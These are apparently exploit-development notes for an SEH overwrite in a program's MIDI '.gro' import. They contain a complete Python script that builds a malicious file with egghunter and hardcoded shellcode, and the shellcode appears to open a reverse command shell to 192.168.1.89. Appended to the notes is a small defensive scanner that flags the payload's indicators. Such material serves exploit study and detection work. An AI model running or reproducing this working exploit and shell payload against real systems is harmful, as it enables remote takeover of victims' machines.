- badchar (steps omitted): `\x00\x0a`
- offset (steps omitted): 178
- return address (SEH, steps omitted): `msacm32.drv`, `0x72d11f39`
- shellcode: more space needed, so an egghunter (`!mona egghunter`)
- shellcode: Limited space, so we use our hardcoded shellcode which was introduced before.
exploit.py

```python
# exploit.py (Python 3 form: byte strings and a binary write, otherwise unchanged)
# File layout: [filler][w00tw00t tag + shellcode][nSEH: jmp +6][SEH: pop pop ret in msacm32.drv][egghunter][filler]

# Hardcoded shellcode, prefixed with the "w00tw00t" tag the egghunter searches for.
shellcode = b"w00tw00t"
shellcode += b"\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\x05\x11\x11\x11\x11\x05\xf0\xf1\xee\xee\x50\xb8\x55\x6a\xab\x71\xff\xd0\x31\xc0\x50\x50\x50\x6a\x06\x6a\x01\x6a\x02\xb8\x6a\x8b\xab\x71\xff\xd0\x89\xc3\x68\xc0\xa8\x01\x59\xb8\x02\x01\x01\xbb\xfe\xcc\x50\x89\xe6\x31\xc0\xb0\x10\x50\x56\x53\xb8\x07\x4a\xab\x71\xff\xd0\x89\xdf\xba\x63\x63\x6d\x64\xc1\xea\x08\x52\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x40\x50\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50\x52\x52\x51\x52\xb8\x6b\x23\x80\x7c\xff\xd0\x31\xc0\x50\xb8\xfa\xca\x81\x7c\xff\xd0"

# Egghunter from "!mona egghunter": scans memory for w00tw00t and jumps to what follows it.
egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

# Filler plus shellcode fills exactly 174 bytes, so nSEH lands at 174 and the SEH handler at offset 178.
payload = b"A" * (178 - 4 - len(shellcode)) + shellcode
# nSEH: short jump 6 bytes forward, over the SEH handler address, into the egghunter.
payload += b"\xeb\x06\x90\x90"
# SEH handler: 0x72d11f39 (pop pop ret in msacm32.drv), written little-endian.
payload += b"\x39\x1f\xd1\x72"
payload += egghunter
# Trailing filler so the overflow reaches far enough to raise the exception.
payload += b"C" * 200

with open("exploit.gro", "wb") as fp:
    fp.write(payload)
```
- proof: Project -> Import MIDI...
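As an added example (not part of the original write-up), a small Python 3 scanner that flags the structure this payload leaves in a `.gro` file: the `w00tw00t` tag, the nSEH short jump followed by the `msacm32.drv` address, the start of the egghunter's syscall loop, and long single-byte filler runs. The sample it scans is constructed here, with NOPs standing in for the shellcode.

```python
import re
import struct

# Indicators taken from the write-up's layout (values as given on the page).
EGG_TAG = b"w00tw00t"                          # tag the egghunter scans memory for
NSEH_SHORT_JMP = b"\xeb\x06\x90\x90"           # jmp +6 over the SEH record, nop-padded
SEH_HANDLER = struct.pack("<I", 0x72d11f39)    # pop pop ret in msacm32.drv, little-endian
# Opening bytes of the NtAccessCheckAndAuditAlarm egghunter loop produced by "!mona egghunter"
EGGHUNTER_PREFIX = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef"


def scan_gro(data: bytes) -> dict:
    """Return offsets of SEH-overwrite / egghunter indicators found in a .gro blob."""
    findings = {}
    seh = data.find(NSEH_SHORT_JMP + SEH_HANDLER)
    if seh != -1:
        findings["seh_overwrite_at"] = seh          # offset of the nSEH slot
    egg = data.find(EGG_TAG)
    if egg != -1:
        findings["egg_tag_at"] = egg
    hunter = data.find(EGGHUNTER_PREFIX)
    if hunter != -1:
        findings["egghunter_at"] = hunter
    # A run of 64 or more identical bytes is overflow filler, not MIDI event data.
    run = re.search(rb"(.)\1{63,}", data, re.DOTALL)
    if run:
        findings["filler_run"] = (run.start(), run.end() - run.start())
    return findings


def constructed_sample() -> bytes:
    """Detection fixture mirroring the page's layout; NOPs replace the shellcode (constructed)."""
    body = EGG_TAG + b"\x90" * 40
    sample = b"A" * (178 - 4 - len(body)) + body
    sample += NSEH_SHORT_JMP + SEH_HANDLER + EGGHUNTER_PREFIX + b"\x90" * 16
    sample += b"C" * 200
    return sample


if __name__ == "__main__":
    print(scan_gro(constructed_sample()))
```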